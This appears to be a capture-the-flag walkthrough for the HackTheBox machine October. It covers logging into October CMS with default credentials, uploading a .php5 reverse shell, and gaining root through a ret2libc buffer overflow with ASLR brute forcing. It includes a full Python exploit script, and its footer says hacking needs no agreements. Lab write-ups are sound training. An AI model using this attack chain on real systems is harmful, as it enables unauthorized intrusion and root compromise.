Hello Friends, here I come with one of the most interesting topics for hackers, guess what: buffer overflow and ASLR brute forcing to get a root shell. To practice it I got a great box (machine) from HackTheBox called October. I know this is a very old machine with lots of walkthroughs, but I felt that most of them are hard to understand for beginners. So here is a HackTheBox October walkthrough which starts with October CMS, then makes a way to a (limited) shell on the machine, and after a little enumeration finds a weird file with the SUID bit set (it runs with its owner's privileges, here root, no matter who executes it). We need to perform a buffer overflow exploitation on that file to get a root shell.
This is my very first HackTheBox walkthrough, and I thought of starting with an interesting box. As usual we are gonna start with simple reconnaissance using nmap and dirb. The first thing I do when I start on a machine is to check which services are running on it and proceed according to that.
Port 80 is open on this machine, so let's go and check it out. Here we can find October CMS running.
When searching about October CMS, I found that the default login page is http://10.10.10.16/backend. Let's go to http://10.10.10.16/backend and try logging in with a simple guess of "admin/admin", and it logs us in.
When reading about October CMS exploits, I found several vulnerabilities at exploit-db.com; go through https://www.exploit-db.com/exploits/41936 for reference. One of them is very useful for us: the upload filter blocks .php files but still lets .php5 files through, and the web server executes those as PHP. So we can upload a PHP reverse shell and get a user shell from the machine. I prefer the PHP reverse shell from Pentest Monkey; you can download it and edit it.
You need to change the IP address to your IP address and the port accordingly.
As per the exploit-db.com entry, October CMS accepts .php5 files in the Media section even though plain .php is rejected. So rename the file's extension from .php to .php5.
Go to Media --> Upload
Select the edited php-reverse-shell.php5 file.
As we are going to establish a reverse shell, let's start netcat listening on the port we set in the file.
Open the uploaded file in the browser to run the reverse shell and get a user shell in the netcat listening terminal.
What we get is a very limited shell, so to get an interactive one, spawn a pseudo-terminal with Python's pty module.
Go to the /home directory and you can find a user named harry; user.txt is in harry's directory.
After a little enumeration, I searched for files with the SUID bit set and found a weird file named ovrflw. Obviously the name itself says overflow, so we can guess that this might lead to a buffer overflow, and because the SUID bit makes it run as its owner (root) we could get a root shell by exploiting it.
Let's check the details of the file. We can see that ovrflw is a 32-bit LSB (least-significant-byte first, i.e. little-endian) ELF executable. This matters later: every address we put on the stack has to be written with its bytes reversed.
As it is an executable, let's test it on our machine first, then exploit it on the target machine. So let's transfer it using nc. I tried transferring it using a Python HTTP server, but for some reason that did not work.
Exploit Development Phase:
Requirements:
GDB debugger and the PEDA plugin
After you are done installing those two, we are good to go. Let's start debugging the ovrflw application.
To Run GDB
To check ASLR status: we can see that ASLR is disabled in this GDB session. GDB turns address randomization off by default so that addresses stay the same from run to run while debugging; this says nothing about the system outside GDB (we check that on the target later).
Let's disassemble the main function to see all the functions this application calls. I was pretty happy after seeing the "strcpy" call, because I am not a pro in assembly and buffer overflows, but I know that strcpy does no bounds checking, is a classic source of stack buffer overflows, and I know how to exploit it :).
Along with that I ran "checksec" to check which security protections are enabled on the binary.
I will give brief info about NX and RELRO here; there is a lot of info available on the internet about them.
NX bit: The NX (no-execute) bit lets the operating system mark memory pages as data only: the processor refuses to execute instructions fetched from a page marked non-executable. This executable-space protection defeats the classic buffer overflow attack of injecting shellcode into a program's stack or data area and jumping to it, because that memory is no longer executable. It does not stop an overflow from redirecting execution into code that is already executable, such as libc functions.
RELRO: Relocation Read-Only:
RELRO is a mitigation technique that hardens the ELF sections the dynamic linker writes to at load time. It has two modes, partial and full. With partial RELRO the ELF internal data sections (.got, .dtors, etc.) are reordered to sit before the program's own .data and .bss, and the non-PLT part of the GOT is made read-only after relocation; the .got.plt used for lazy binding stays writable, so overwriting a GOT entry to hijack control flow is still possible. With full RELRO all symbols are resolved at startup (BIND_NOW) and the entire GOT is then mapped read-only, which mitigates GOT-overwrite attacks.
So in our case NX is enabled and RELRO is only partial, which is still exploitable because .got.plt is writable. We won't need a GOT overwrite here, though. What NX takes away is running shellcode from the stack, so the plan is return-to-libc: overwrite the saved return address with the address of system() and place "/bin/sh" where it expects its argument, which needs only a writable stack.
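To see where "NX enabled" and "Partial RELRO" actually come from, here is a small checksec-style parser. It is an added example, not the page's tooling or PEDA's checksec code: it reads the PT_GNU_STACK, PT_GNU_RELRO and PT_DYNAMIC program headers of a 32-bit little-endian ELF (the format of ovrflw) and applies the same rules checksec uses. The ELF images it inspects by default are constructed in memory and are not loadable; pass a real binary as argv[1] to inspect it instead.

```python
"""Minimal checksec for 32-bit little-endian ELF: reports NX and RELRO from the
program headers and the dynamic section.  Added example, not the page's tooling;
the sample images built by make_elf() are constructed in memory."""
import struct
import sys

PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

EHDR = "<16sHHIIIIIHHHHHH"   # ELF32 file header, 52 bytes
PHDR = "<8I"                 # ELF32 program header, 32 bytes
DYN = "<iI"                  # ELF32 dynamic entry, 8 bytes


def make_elf(nx=True, relro="partial"):
    """Build a tiny, non-loadable ELF32 image with only the headers checksec
    looks at.  relro is one of "none", "partial", "full" (constructed sample)."""
    stack_flags = PF_R | PF_W | (0 if nx else PF_X)
    phdrs = [(PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)]
    if relro != "none":
        phdrs.append((PT_GNU_RELRO, 0, 0, 0, 0, 0, PF_R, 1))
    dyn = ([(DT_BIND_NOW, 0)] if relro == "full" else []) + [(DT_NULL, 0)]
    dyn_blob = b"".join(struct.pack(DYN, *d) for d in dyn)
    # dynamic table goes right after the header and the (n+1) program headers
    dyn_off = struct.calcsize(EHDR) + struct.calcsize(PHDR) * (len(phdrs) + 1)
    phdrs.append((PT_DYNAMIC, dyn_off, 0, 0, len(dyn_blob), len(dyn_blob), PF_R | PF_W, 4))
    ident = b"\x7fELF" + bytes([1, 1, 1]) + b"\x00" * 9   # ELFCLASS32, little-endian, v1
    ehdr = struct.pack(EHDR, ident, 2, 3, 1, 0, struct.calcsize(EHDR), 0, 0,
                       struct.calcsize(EHDR), struct.calcsize(PHDR), len(phdrs), 0, 0, 0)
    return ehdr + b"".join(struct.pack(PHDR, *p) for p in phdrs) + dyn_blob


def checksec(blob):
    """Return {"nx": bool, "relro": "none" | "partial" | "full"} for an ELF32 LE image."""
    ident, _, _, _, _, phoff, _, _, _, phentsize, phnum, _, _, _ = struct.unpack_from(EHDR, blob, 0)
    if ident[:4] != b"\x7fELF" or ident[4] != 1 or ident[5] != 1:
        raise ValueError("only 32-bit little-endian ELF is handled here")
    phdrs = [struct.unpack_from(PHDR, blob, phoff + i * phentsize) for i in range(phnum)]
    by_type = {p[0]: p for p in phdrs}

    # NX: the stack is non-executable unless PT_GNU_STACK carries PF_X (or is
    # missing altogether, which the loader treats as an executable stack).
    stack = by_type.get(PT_GNU_STACK)
    nx = stack is not None and not (stack[6] & PF_X)

    # RELRO: PT_GNU_RELRO is the region remapped read-only after relocation.
    # Partial RELRO covers .got but leaves .got.plt writable for lazy binding;
    # full RELRO additionally asks for BIND_NOW, so .got.plt is resolved at
    # startup and falls inside the read-only region.
    if PT_GNU_RELRO not in by_type:
        relro = "none"
    else:
        relro = "partial"
        dyn = by_type.get(PT_DYNAMIC)
        if dyn is not None:
            off, size = dyn[1], dyn[4]
            for i in range(size // struct.calcsize(DYN)):
                tag, val = struct.unpack_from(DYN, blob, off + i * struct.calcsize(DYN))
                if tag == DT_NULL:
                    break
                if (tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW)
                        or (tag == DT_FLAGS_1 and val & DF_1_NOW)):
                    relro = "full"
    return {"nx": nx, "relro": relro}


if __name__ == "__main__":
    if len(sys.argv) > 1:                      # e.g. python3 checksec.py ./ovrflw
        with open(sys.argv[1], "rb") as f:
            print(checksec(f.read()))
    else:                                      # constructed samples
        print("ovrflw-like:", checksec(make_elf(nx=True, relro="partial")))
        print("hardened:   ", checksec(make_elf(nx=True, relro="full")))
```

The "full" sample differs from the "partial" one only by a DT_BIND_NOW entry in the dynamic section; that single flag is what moves .got.plt into the read-only region, which is why checksec reports RELRO as a property of the dynamic section and not just of the program headers.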
Let's try overflowing our little binary. We can use pattern_create to generate a long non-repeating pattern and pass it as the input, so that whatever lands in EIP tells us exactly which part of the input got there.
Let's send the pattern as the argument in gdb and look at the crash. EIP has been overwritten with 0x41384141, which is four bytes of our pattern read as a little-endian dword.
Now we need to find the pattern offset, i.e. after how many characters of input the saved return address gets overwritten. Looking up 0x41384141 with pattern_offset tells us those bytes sit 112 characters into the pattern, so we control EIP after 112 characters.
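The following is an added example of what pattern_create and pattern_offset do under the hood; it is not the page's gdb session or PEDA's code. It uses the Metasploit-style Aa0Aa1... alphabet rather than PEDA's, so the offsets it prints for a given crash value differ from PEDA's output, but the lookup logic is identical: pack the EIP value GDB shows back into little-endian bytes and search the pattern for them. simulate_crash() is a helper assumed here to stand in for the real crash.

```python
"""Cyclic pattern generation and EIP-offset lookup (Metasploit-style alphabet).
Added example, not the page's own commands or PEDA's implementation."""
import itertools
import string
import struct


def pattern_create(length):
    """Aa0Aa1Aa2 ... Zz9: every 4-byte window identifies a single position
    within the first 20280 bytes, which is what makes the offset lookup work."""
    triplets = ("%s%s%s" % t for t in itertools.product(string.ascii_uppercase,
                                                         string.ascii_lowercase,
                                                         string.digits))
    return "".join(triplets)[:length]


def eip_to_bytes(value):
    """The value GDB prints for EIP (e.g. 0x41384141) is a little-endian dword;
    the bytes that overwrote it sit in memory in reverse order ("AA8A")."""
    return struct.pack("<I", value)


def pattern_offset(pattern, value):
    """Offset of the crash value inside the pattern, or -1 if it is not there.
    Little-endian is tried first (x86); raw byte order is a fallback."""
    data = pattern.encode()
    for needle in (eip_to_bytes(value), struct.pack(">I", value)):
        idx = data.find(needle)
        if idx != -1:
            return idx
    return -1


def simulate_crash(pattern, offset):
    """What GDB would report as EIP if the saved return address started at
    `offset` bytes into the input (stand-in for the real crash)."""
    return struct.unpack("<I", pattern[offset:offset + 4].encode())[0]


if __name__ == "__main__":
    pat = pattern_create(200)
    print(pat)                            # feed this as argv[1] under gdb
    eip = simulate_crash(pat, 112)        # pretend EIP was 112 bytes in
    print(hex(eip), "->", pattern_offset(pat, eip))
    print(eip_to_bytes(0x41384141))       # the page's crash value as bytes
```

A -1 result usually means the pattern was longer than the crash needed and EIP was overwritten with something other than the pattern (a pointer from elsewhere on the stack), or the value was copied in a byte order the two searches do not cover.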
If you want to find the EBP and EIP values, you can use the command
OK, everything is good so far. Let's shift to the target machine and develop our exploit there, because the libc addresses we need depend on the target's own libc build. We need a few things to get a shell; the main ones are the addresses of "system" and of the string "/bin/sh" inside libc. We also need the address of "exit", so the program terminates cleanly instead of crashing when the shell closes.
We need system to be called with "/bin/sh" as its argument so that we get a shell. Let's start with finding the system address. The system address is 0xb759c310.
To find the address of "/bin/sh", search forward from the system address with gdb's find command (the string lives in libc's read-only data, above system). 0xb76bebac is our "/bin/sh" address.
Let's confirm the address of "/bin/sh" in gdb using the following command
In the same way, find the address of "exit" as well. The exit address is 0xb758f260.
Here comes the main part: ASLR is active on the target machine. You can check this by reading /proc/sys/kernel/randomize_va_space:
if the output is "0", ASLR is disabled;
if the output is "1", the stack, mmap regions and shared libraries (libc) are randomized;
if the output is "2", the heap (brk) base is randomized as well. Here it is active.
ASLR randomizes the base address at which libc is mapped, so the system, exit and "/bin/sh" addresses we found are only valid on a run where libc lands at that same base. On 32-bit Linux only a few bits of that base are randomized, so instead of leaking the address we can simply brute force: run the binary with our fixed guess again and again until the guess is right. We need to make an exploit with all 4 values we got. The order of the exploit is "A"*112 + system + exit + "/bin/sh": system replaces the saved return address, the next dword is what system will use as its own return address (exit), and the one after that is system's first argument ("/bin/sh"), each written as a 4-byte little-endian address.
So the final exploit is
It might take up to about 5 minutes to brute force and get the shell, so wait for it.
That's it, here is root and root.txt. Enjoy!!!
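As an added example (not the page's final exploit), the payload layout and the brute-force loop written out in Python, using the page's values: 112 bytes to EIP and the libc addresses found with gdb on the target (system 0xb759c310, exit 0xb758f260, "/bin/sh" 0xb76bebac). The ./ovrflw path is an assumption, and the loop stops on the first run that is not killed by a signal, which with the right guess is the run where /bin/sh was spawned and later closed.

```python
"""ret2libc payload builder and ASLR brute-force loop for ovrflw.
Added example, not the page's exploit; addresses are the page's gdb values."""
import os
import struct
import subprocess
import sys

OFFSET = 112                  # bytes before the saved return address
SYSTEM = 0xB759C310           # libc addresses from gdb on the target
EXIT = 0xB758F260
BINSH = 0xB76BEBAC
BINARY = "./ovrflw"           # assumed path to the SUID binary


def p32(addr):
    """Pack an address as a little-endian dword, the way it sits on an x86 stack."""
    return struct.pack("<I", addr)


def build_payload(offset=OFFSET, system=SYSTEM, exit_=EXIT, binsh=BINSH):
    """Stack after strcpy overflows the buffer:

        ['A' * offset][saved EIP -> system][system's ret addr -> exit][arg1 -> "/bin/sh"]

    main's `ret` pops system's address into EIP.  system then sees the next
    dword as its own return address (exit) and the one after it as its first
    argument ("/bin/sh"), exactly the cdecl frame a real `call system` leaves.
    """
    payload = b"A" * offset + p32(system) + p32(exit_) + p32(binsh)
    if b"\x00" in payload:
        # argv strings are NUL-terminated and strcpy stops at the first 0x00,
        # so an address containing a zero byte could never reach the stack whole
        raise ValueError("payload contains a NUL byte; it cannot pass through argv/strcpy")
    return payload


def brute_force(binary, payload, max_tries=2000):
    """Run the binary with the same payload until the libc guess is right.

    With ASLR, libc is mapped at a different base on every run, but only a few
    bits of that base are randomized on 32-bit Linux, so a fixed guess hits
    after a few hundred tries on average.  A wrong guess crashes the process
    (killed by a signal, negative return code); a right one runs /bin/sh with
    our terminal attached and returns normally once that shell exits.
    Returns the attempt number that succeeded, or None.
    """
    argv = [os.fsencode(binary), payload]
    for attempt in range(1, max_tries + 1):
        if subprocess.call(argv) >= 0:
            return attempt
    return None


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else BINARY
    payload = build_payload()
    print("payload: %d bytes, tail %s" % (len(payload), payload[OFFSET:].hex()))
    hit = brute_force(target, payload)
    print("shell returned after %s attempts" % hit if hit else "no hit; re-check the addresses")
```

Because the exit address on the stack is followed by "/bin/sh" rather than a real exit status, the process's exit code after the shell closes is garbage; the loop therefore keys on "not killed by a signal" rather than on a zero exit code. If a run ever returns cleanly without having given you a shell, the guess landed somewhere harmless in libc and you simply re-run the loop.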
================== HACKING DREAM ===================
Main Principle of My Hacking Dream is to Promote Hacking Tricks and Tips to All the People in the World, So That Everyone will be Aware of Hacking and protect themselves from Getting Hacked. Hacking Don’t Need Agreements.
I Will Be Very Happy To Help You, So For Queries or Any Problem Comment Below or You Can Mail Me At [email protected]